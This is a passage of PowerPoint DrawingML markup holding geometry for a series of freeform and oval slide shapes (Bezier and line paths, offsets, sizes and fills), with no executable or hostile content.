                  <a:gd name="T4" fmla="*/ 11 w 68"/>
                  <a:gd name="T5" fmla="*/ 9 h 77"/>
                  <a:gd name="T6" fmla="*/ 54 w 68"/>
                  <a:gd name="T7" fmla="*/ 23 h 77"/>
                  <a:gd name="T8" fmla="*/ 57 w 68"/>
                  <a:gd name="T9" fmla="*/ 69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"/>
                  <a:gd name="T16" fmla="*/ 0 h 77"/>
                  <a:gd name="T17" fmla="*/ 68 w 68"/>
                  <a:gd name="T18" fmla="*/ 77 h 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" h="77">
                    <a:moveTo>
                      <a:pt x="57" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="77"/>
                      <a:pt x="26" y="71"/>
                      <a:pt x="14" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="38"/>
                      <a:pt x="0" y="17"/>
                      <a:pt x="11" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="0"/>
                      <a:pt x="42" y="7"/>
                      <a:pt x="54" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="40"/>
                      <a:pt x="68" y="60"/>
                      <a:pt x="57" y="69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7" name="Freeform 14564"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1495" y="1545"/>
                <a:ext cx="71" cy="82"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 15 w 18"/>
                  <a:gd name="T1" fmla="*/ 19 h 21"/>
                  <a:gd name="T2" fmla="*/ 3 w 18"/>
                  <a:gd name="T3" fmla="*/ 15 h 21"/>
                  <a:gd name="T4" fmla="*/ 3 w 18"/>
                  <a:gd name="T5" fmla="*/ 3 h 21"/>
                  <a:gd name="T6" fmla="*/ 15 w 18"/>
                  <a:gd name="T7" fmla="*/ 7 h 21"/>
                  <a:gd name="T8" fmla="*/ 15 w 18"/>
                  <a:gd name="T9" fmla="*/ 1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21"/>
                  <a:gd name="T17" fmla="*/ 18 w 18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21">
                    <a:moveTo>
                      <a:pt x="15" y="19"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="21"/>
                      <a:pt x="7" y="19"/>
                      <a:pt x="3" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="10"/>
                      <a:pt x="0" y="5"/>
                      <a:pt x="3" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="0"/>
                      <a:pt x="11" y="2"/>
                      <a:pt x="15" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="11"/>
                      <a:pt x="18" y="16"/>
                      <a:pt x="15" y="1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8" name="Freeform 14565"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1520" y="1570"/>
                <a:ext cx="23" cy="29"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 6"/>
                  <a:gd name="T1" fmla="*/ 7 h 7"/>
                  <a:gd name="T2" fmla="*/ 1 w 6"/>
                  <a:gd name="T3" fmla="*/ 5 h 7"/>
                  <a:gd name="T4" fmla="*/ 1 w 6"/>
                  <a:gd name="T5" fmla="*/ 1 h 7"/>
                  <a:gd name="T6" fmla="*/ 5 w 6"/>
                  <a:gd name="T7" fmla="*/ 2 h 7"/>
                  <a:gd name="T8" fmla="*/ 5 w 6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7"/>
                  <a:gd name="T17" fmla="*/ 6 w 6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7">
                    <a:moveTo>
                      <a:pt x="5" y="7"/>
                    </a:move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2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="4"/>
                      <a:pt x="6" y="6"/>
                      <a:pt x="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9" name="Freeform 14566"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1452" y="1393"/>
                <a:ext cx="83" cy="177"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 21"/>
                  <a:gd name="T1" fmla="*/ 0 h 45"/>
                  <a:gd name="T2" fmla="*/ 0 w 21"/>
                  <a:gd name="T3" fmla="*/ 42 h 45"/>
                  <a:gd name="T4" fmla="*/ 11 w 21"/>
                  <a:gd name="T5" fmla="*/ 45 h 45"/>
                  <a:gd name="T6" fmla="*/ 21 w 21"/>
                  <a:gd name="T7" fmla="*/ 42 h 45"/>
                  <a:gd name="T8" fmla="*/ 21 w 21"/>
                  <a:gd name="T9" fmla="*/ 0 h 45"/>
                  <a:gd name="T10" fmla="*/ 0 w 21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45"/>
                  <a:gd name="T20" fmla="*/ 21 w 21"/>
                  <a:gd name="T21" fmla="*/ 45 h 4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45">
                    <a:moveTo>
                      <a:pt x="0" y="0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0" y="43"/>
                      <a:pt x="5" y="45"/>
                      <a:pt x="11" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="45"/>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="0"/>
                      <a:pt x="21" y="0"/>
                      <a:pt x="2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0" name="Oval 14567"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1452" y="1385"/>
                <a:ext cx="83" cy="20"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="158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1" name="Freeform 14568"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1435" y="1228"/>
                <a:ext cx="117" cy="197"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 29"/>
                  <a:gd name="T1" fmla="*/ 0 h 50"/>
                  <a:gd name="T2" fmla="*/ 0 w 29"/>
                  <a:gd name="T3" fmla="*/ 46 h 50"/>
                  <a:gd name="T4" fmla="*/ 15 w 29"/>
                  <a:gd name="T5" fmla="*/ 50 h 50"/>
                  <a:gd name="T6" fmla="*/ 29 w 29"/>
                  <a:gd name="T7" fmla="*/ 46 h 50"/>
                  <a:gd name="T8" fmla="*/ 29 w 29"/>
                  <a:gd name="T9" fmla="*/ 0 h 50"/>
                  <a:gd name="T10" fmla="*/ 0 w 29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9"/>
                  <a:gd name="T19" fmla="*/ 0 h 50"/>
                  <a:gd name="T20" fmla="*/ 29 w 29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9" h="50">
                    <a:moveTo>
                      <a:pt x="0" y="0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0" y="48"/>
                      <a:pt x="7" y="50"/>
                      <a:pt x="15" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="50"/>
                      <a:pt x="29" y="48"/>
                      <a:pt x="29" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="0"/>
                      <a:pt x="29" y="0"/>
                      <a:pt x="2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2" name="Freeform 14569"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1403" y="1162"/>
                <a:ext cx="180" cy="174"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 45"/>
                  <a:gd name="T1" fmla="*/ 0 h 44"/>
                  <a:gd name="T2" fmla="*/ 0 w 45"/>
                  <a:gd name="T3" fmla="*/ 38 h 44"/>
                  <a:gd name="T4" fmla="*/ 23 w 45"/>
                  <a:gd name="T5" fmla="*/ 44 h 44"/>
                  <a:gd name="T6" fmla="*/ 45 w 45"/>
                  <a:gd name="T7" fmla="*/ 38 h 44"/>
                  <a:gd name="T8" fmla="*/ 45 w 45"/>
                  <a:gd name="T9" fmla="*/ 0 h 44"/>
                  <a:gd name="T10" fmla="*/ 0 w 45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5"/>
                  <a:gd name="T19" fmla="*/ 0 h 44"/>
                  <a:gd name="T20" fmla="*/ 45 w 45"/>
                  <a:gd name="T21" fmla="*/ 44 h 4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5" h="44">
                    <a:moveTo>
                      <a:pt x="0" y="0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42"/>
                      <a:pt x="10" y="44"/>
                      <a:pt x="23" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="44"/>
                      <a:pt x="45" y="42"/>
                      <a:pt x="45" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="0"/>
                      <a:pt x="45" y="0"/>
                      <a:pt x="4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3" name="Freeform 14570"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1318" y="1467"/>
                <a:ext cx="265" cy="289"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 53 w 67"/>
                  <a:gd name="T1" fmla="*/ 21 h 74"/>
                  <a:gd name="T2" fmla="*/ 14 w 67"/>
                  <a:gd name="T3" fmla="*/ 4 h 74"/>
                  <a:gd name="T4" fmla="*/ 14 w 67"/>
                  <a:gd name="T5" fmla="*/ 4 h 74"/>
                  <a:gd name="T6" fmla="*/ 4 w 67"/>
                  <a:gd name="T7" fmla="*/ 7 h 74"/>
                  <a:gd name="T8" fmla="*/ 6 w 67"/>
                  <a:gd name="T9" fmla="*/ 12 h 74"/>
                  <a:gd name="T10" fmla="*/ 13 w 67"/>
                  <a:gd name="T11" fmla="*/ 52 h 74"/>
                  <a:gd name="T12" fmla="*/ 31 w 67"/>
                  <a:gd name="T13" fmla="*/ 67 h 74"/>
                  <a:gd name="T14" fmla="*/ 34 w 67"/>
                  <a:gd name="T15" fmla="*/ 74 h 74"/>
                  <a:gd name="T16" fmla="*/ 49 w 67"/>
                  <a:gd name="T17" fmla="*/ 70 h 74"/>
                  <a:gd name="T18" fmla="*/ 49 w 67"/>
                  <a:gd name="T19" fmla="*/ 70 h 74"/>
                  <a:gd name="T20" fmla="*/ 56 w 67"/>
                  <a:gd name="T21" fmla="*/ 67 h 74"/>
                  <a:gd name="T22" fmla="*/ 53 w 67"/>
                  <a:gd name="T23" fmla="*/ 21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7"/>
                  <a:gd name="T37" fmla="*/ 0 h 74"/>
                  <a:gd name="T38" fmla="*/ 67 w 67"/>
                  <a:gd name="T39" fmla="*/ 74 h 7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7" h="74">
                    <a:moveTo>
                      <a:pt x="53" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="7"/>
                      <a:pt x="26" y="0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0" y="22"/>
                      <a:pt x="2" y="38"/>
                      <a:pt x="13" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="59"/>
                      <a:pt x="25" y="64"/>
                      <a:pt x="31" y="67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1" y="69"/>
                      <a:pt x="54" y="68"/>
                      <a:pt x="56" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="58"/>
                      <a:pt x="66" y="38"/>
                      <a:pt x="53" y="21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4" name="Freeform 14571"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1258" y="1473"/>
                <a:ext cx="271" cy="303"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 57 w 68"/>
                  <a:gd name="T1" fmla="*/ 68 h 77"/>
                  <a:gd name="T2" fmla="*/ 14 w 68"/>
                  <a:gd name="T3" fmla="*/ 54 h 77"/>
                  <a:gd name="T4" fmla="*/ 11 w 68"/>
                  <a:gd name="T5" fmla="*/ 9 h 77"/>
                  <a:gd name="T6" fmla="*/ 54 w 68"/>
                  <a:gd name="T7" fmla="*/ 23 h 77"/>
                  <a:gd name="T8" fmla="*/ 57 w 68"/>
                  <a:gd name="T9" fmla="*/ 68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"/>
                  <a:gd name="T16" fmla="*/ 0 h 77"/>
                  <a:gd name="T17" fmla="*/ 68 w 68"/>
                  <a:gd name="T18" fmla="*/ 77 h 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" h="77">
                    <a:moveTo>
                      <a:pt x="57" y="68"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="77"/>
                      <a:pt x="26" y="70"/>
                      <a:pt x="14" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="37"/>
                      <a:pt x="0" y="17"/>
                      <a:pt x="11" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="0"/>
                      <a:pt x="42" y="7"/>
                      <a:pt x="54" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="39"/>
                      <a:pt x="68" y="60"/>
                      <a:pt x="57" y="68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5" name="Freeform 14572"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1358" y="1582"/>
                <a:ext cx="71" cy="85"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 15 w 18"/>
                  <a:gd name="T1" fmla="*/ 19 h 21"/>
                  <a:gd name="T2" fmla="*/ 3 w 18"/>
                  <a:gd name="T3" fmla="*/ 15 h 21"/>
                  <a:gd name="T4" fmla="*/ 3 w 18"/>
                  <a:gd name="T5" fmla="*/ 2 h 21"/>
                  <a:gd name="T6" fmla="*/ 14 w 18"/>
                  <a:gd name="T7" fmla="*/ 6 h 21"/>
                  <a:gd name="T8" fmla="*/ 15 w 18"/>
                  <a:gd name="T9" fmla="*/ 1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21"/>
                  <a:gd name="T17" fmla="*/ 18 w 18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21">
                    <a:moveTo>
                      <a:pt x="15" y="19"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="21"/>
                      <a:pt x="7" y="19"/>
                      <a:pt x="3" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="10"/>
                      <a:pt x="0" y="5"/>
                      <a:pt x="3" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="0"/>
                      <a:pt x="11" y="2"/>
                      <a:pt x="14" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="11"/>
                      <a:pt x="18" y="16"/>
                      <a:pt x="15" y="1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6" name="Freeform 14573"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1381" y="1610"/>
                <a:ext cx="22" cy="29"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 6"/>
                  <a:gd name="T1" fmla="*/ 6 h 7"/>
                  <a:gd name="T2" fmla="*/ 1 w 6"/>
                  <a:gd name="T3" fmla="*/ 5 h 7"/>
                  <a:gd name="T4" fmla="*/ 1 w 6"/>
                  <a:gd name="T5" fmla="*/ 1 h 7"/>
                  <a:gd name="T6" fmla="*/ 5 w 6"/>
                  <a:gd name="T7" fmla="*/ 2 h 7"/>
                  <a:gd name="T8" fmla="*/ 5 w 6"/>
                  <a:gd name="T9" fmla="*/ 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7"/>
                  <a:gd name="T17" fmla="*/ 6 w 6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7">
                    <a:moveTo>
                      <a:pt x="5" y="6"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="7"/>
                      <a:pt x="2" y="6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6" y="4"/>
                      <a:pt x="6" y="5"/>
                      <a:pt x="5" y="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7" name="Freeform 14574"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5837" y="-367"/>
                <a:ext cx="4626" cy="1997"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2775"/>
                  <a:gd name="T1" fmla="*/ 789 h 1198"/>
                  <a:gd name="T2" fmla="*/ 1495 w 2775"/>
                  <a:gd name="T3" fmla="*/ 1198 h 1198"/>
                  <a:gd name="T4" fmla="*/ 2043 w 2775"/>
                  <a:gd name="T5" fmla="*/ 706 h 1198"/>
                  <a:gd name="T6" fmla="*/ 2775 w 2775"/>
                  <a:gd name="T7" fmla="*/ 95 h 1198"/>
                  <a:gd name="T8" fmla="*/ 2426 w 2775"/>
                  <a:gd name="T9" fmla="*/ 0 h 1198"/>
                  <a:gd name="T10" fmla="*/ 0 w 2775"/>
                  <a:gd name="T11" fmla="*/ 789 h 11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775"/>
                  <a:gd name="T19" fmla="*/ 0 h 1198"/>
                  <a:gd name="T20" fmla="*/ 2775 w 2775"/>
                  <a:gd name="T21" fmla="*/ 1198 h 119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775" h="1198">
                    <a:moveTo>
                      <a:pt x="0" y="789"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1495" y="1198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2043" y="706"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2775" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2426" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="78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8" name="Freeform 14575"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="342" y="-467"/>
                <a:ext cx="11750" cy="3769"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 247 w 2983"/>
                  <a:gd name="T1" fmla="*/ 42 h 956"/>
                  <a:gd name="T2" fmla="*/ 448 w 2983"/>
                  <a:gd name="T3" fmla="*/ 23 h 956"/>
                  <a:gd name="T4" fmla="*/ 932 w 2983"/>
                  <a:gd name="T5" fmla="*/ 193 h 956"/>
                  <a:gd name="T6" fmla="*/ 2930 w 2983"/>
                  <a:gd name="T7" fmla="*/ 692 h 956"/>
                  <a:gd name="T8" fmla="*/ 2936 w 2983"/>
                  <a:gd name="T9" fmla="*/ 694 h 956"/>
                  <a:gd name="T10" fmla="*/ 2937 w 2983"/>
                  <a:gd name="T11" fmla="*/ 694 h 956"/>
                  <a:gd name="T12" fmla="*/ 2937 w 2983"/>
                  <a:gd name="T13" fmla="*/ 694 h 956"/>
                  <a:gd name="T14" fmla="*/ 2978 w 2983"/>
                  <a:gd name="T15" fmla="*/ 755 h 956"/>
                  <a:gd name="T16" fmla="*/ 2949 w 2983"/>
                  <a:gd name="T17" fmla="*/ 828 h 956"/>
                  <a:gd name="T18" fmla="*/ 2949 w 2983"/>
                  <a:gd name="T19" fmla="*/ 828 h 956"/>
                  <a:gd name="T20" fmla="*/ 2949 w 2983"/>
                  <a:gd name="T21" fmla="*/ 828 h 956"/>
                  <a:gd name="T22" fmla="*/ 2941 w 2983"/>
                  <a:gd name="T23" fmla="*/ 831 h 956"/>
                  <a:gd name="T24" fmla="*/ 2933 w 2983"/>
                  <a:gd name="T25" fmla="*/ 831 h 956"/>
                  <a:gd name="T26" fmla="*/ 1888 w 2983"/>
                  <a:gd name="T27" fmla="*/ 900 h 956"/>
                  <a:gd name="T28" fmla="*/ 834 w 2983"/>
                  <a:gd name="T29" fmla="*/ 640 h 956"/>
                  <a:gd name="T30" fmla="*/ 37 w 2983"/>
                  <a:gd name="T31" fmla="*/ 163 h 956"/>
                  <a:gd name="T32" fmla="*/ 247 w 2983"/>
                  <a:gd name="T33" fmla="*/ 42 h 9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983"/>
                  <a:gd name="T52" fmla="*/ 0 h 956"/>
                  <a:gd name="T53" fmla="*/ 2983 w 2983"/>
                  <a:gd name="T54" fmla="*/ 956 h 9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983" h="956">
                    <a:moveTo>
                      <a:pt x="247" y="42"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="321" y="22"/>
                      <a:pt x="344" y="0"/>
                      <a:pt x="448" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="585" y="53"/>
                      <a:pt x="869" y="168"/>
                      <a:pt x="932" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1075" y="248"/>
                      <a:pt x="2804" y="662"/>
                      <a:pt x="2930" y="692"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2932" y="692"/>
                      <a:pt x="2934" y="693"/>
                      <a:pt x="2936" y="694"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2937" y="694"/>
                      <a:pt x="2937" y="694"/>
                      <a:pt x="2937" y="694"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2937" y="694"/>
                      <a:pt x="2937" y="694"/>
                      <a:pt x="2937" y="694"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2957" y="701"/>
                      <a:pt x="2973" y="725"/>
                      <a:pt x="2978" y="755"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2983" y="788"/>
                      <a:pt x="2970" y="819"/>
                      <a:pt x="2949" y="828"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2949" y="828"/>
                      <a:pt x="2949" y="828"/>
                      <a:pt x="2949" y="828"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2949" y="828"/>
                      <a:pt x="2949" y="828"/>
                      <a:pt x="2949" y="828"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2947" y="830"/>
                      <a:pt x="2944" y="831"/>
                      <a:pt x="2941" y="831"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2938" y="831"/>
                      <a:pt x="2935" y="831"/>
                      <a:pt x="2933" y="831"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2816" y="850"/>
                      <a:pt x="2117" y="956"/>
                      <a:pt x="1888" y="900"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1639" y="839"/>
                      <a:pt x="834" y="640"/>
                      <a:pt x="834" y="640"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="457" y="546"/>
                      <a:pt x="0" y="319"/>
                      <a:pt x="37" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="133"/>
                      <a:pt x="78" y="88"/>
                      <a:pt x="247" y="4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9" name="Freeform 14576"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1435" y="-367"/>
                <a:ext cx="379" cy="291"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 96 w 96"/>
                  <a:gd name="T1" fmla="*/ 43 h 74"/>
                  <a:gd name="T2" fmla="*/ 25 w 96"/>
                  <a:gd name="T3" fmla="*/ 0 h 74"/>
                  <a:gd name="T4" fmla="*/ 0 w 96"/>
                  <a:gd name="T5" fmla="*/ 8 h 74"/>
                  <a:gd name="T6" fmla="*/ 89 w 96"/>
                  <a:gd name="T7" fmla="*/ 74 h 74"/>
                  <a:gd name="T8" fmla="*/ 96 w 96"/>
                  <a:gd name="T9" fmla="*/ 4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74"/>
                  <a:gd name="T17" fmla="*/ 96 w 96"/>
                  <a:gd name="T18" fmla="*/ 74 h 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74">
                    <a:moveTo>
                      <a:pt x="96" y="43"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="43"/>
                      <a:pt x="40" y="25"/>
                      <a:pt x="25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33" y="61"/>
                      <a:pt x="89" y="74"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="96" y="4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70" name="Freeform 14577"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1495" y="1365"/>
                <a:ext cx="5678" cy="2308"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1778 w 3404"/>
                  <a:gd name="T1" fmla="*/ 0 h 1382"/>
                  <a:gd name="T2" fmla="*/ 0 w 3404"/>
                  <a:gd name="T3" fmla="*/ 1226 h 1382"/>
                  <a:gd name="T4" fmla="*/ 543 w 3404"/>
                  <a:gd name="T5" fmla="*/ 1382 h 1382"/>
                  <a:gd name="T6" fmla="*/ 2069 w 3404"/>
                  <a:gd name="T7" fmla="*/ 778 h 1382"/>
                  <a:gd name="T8" fmla="*/ 3404 w 3404"/>
                  <a:gd name="T9" fmla="*/ 435 h 1382"/>
                  <a:gd name="T10" fmla="*/ 1778 w 3404"/>
                  <a:gd name="T11" fmla="*/ 0 h 13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04"/>
                  <a:gd name="T19" fmla="*/ 0 h 1382"/>
                  <a:gd name="T20" fmla="*/ 3404 w 3404"/>
                  <a:gd name="T21" fmla="*/ 1382 h 138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04" h="1382">
                    <a:moveTo>
                      <a:pt x="1778" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="1382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2069" y="778"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3404" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177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71" name="Freeform 14578"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="10343" y="1604"/>
                <a:ext cx="3107" cy="671"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 784 w 1864"/>
                  <a:gd name="T1" fmla="*/ 402 h 402"/>
                  <a:gd name="T2" fmla="*/ 1864 w 1864"/>
                  <a:gd name="T3" fmla="*/ 33 h 402"/>
                  <a:gd name="T4" fmla="*/ 1675 w 1864"/>
                  <a:gd name="T5" fmla="*/ 0 h 402"/>
                  <a:gd name="T6" fmla="*/ 0 w 1864"/>
                  <a:gd name="T7" fmla="*/ 248 h 402"/>
                  <a:gd name="T8" fmla="*/ 784 w 1864"/>
                  <a:gd name="T9" fmla="*/ 402 h 4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4"/>
                  <a:gd name="T16" fmla="*/ 0 h 402"/>
                  <a:gd name="T17" fmla="*/ 1864 w 1864"/>
                  <a:gd name="T18" fmla="*/ 402 h 4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4" h="402">
                    <a:moveTo>
                      <a:pt x="784" y="402"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1864" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1675" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="784" y="40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72" name="Freeform 14579"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="9558" y="2266"/>
                <a:ext cx="1504" cy="754"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 902 w 902"/>
                  <a:gd name="T1" fmla="*/ 163 h 451"/>
                  <a:gd name="T2" fmla="*/ 281 w 902"/>
                  <a:gd name="T3" fmla="*/ 451 h 451"/>
                  <a:gd name="T4" fmla="*/ 0 w 902"/>
                  <a:gd name="T5" fmla="*/ 392 h 451"/>
                  <a:gd name="T6" fmla="*/ 28 w 902"/>
                  <a:gd name="T7" fmla="*/ 0 h 451"/>
                  <a:gd name="T8" fmla="*/ 902 w 902"/>
                  <a:gd name="T9" fmla="*/ 163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02"/>
                  <a:gd name="T16" fmla="*/ 0 h 451"/>
                  <a:gd name="T17" fmla="*/ 902 w 902"/>
                  <a:gd name="T18" fmla="*/ 451 h 4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02" h="451">
                    <a:moveTo>
                      <a:pt x="902" y="163"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="281" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="902" y="16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73" name="Freeform 14580"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
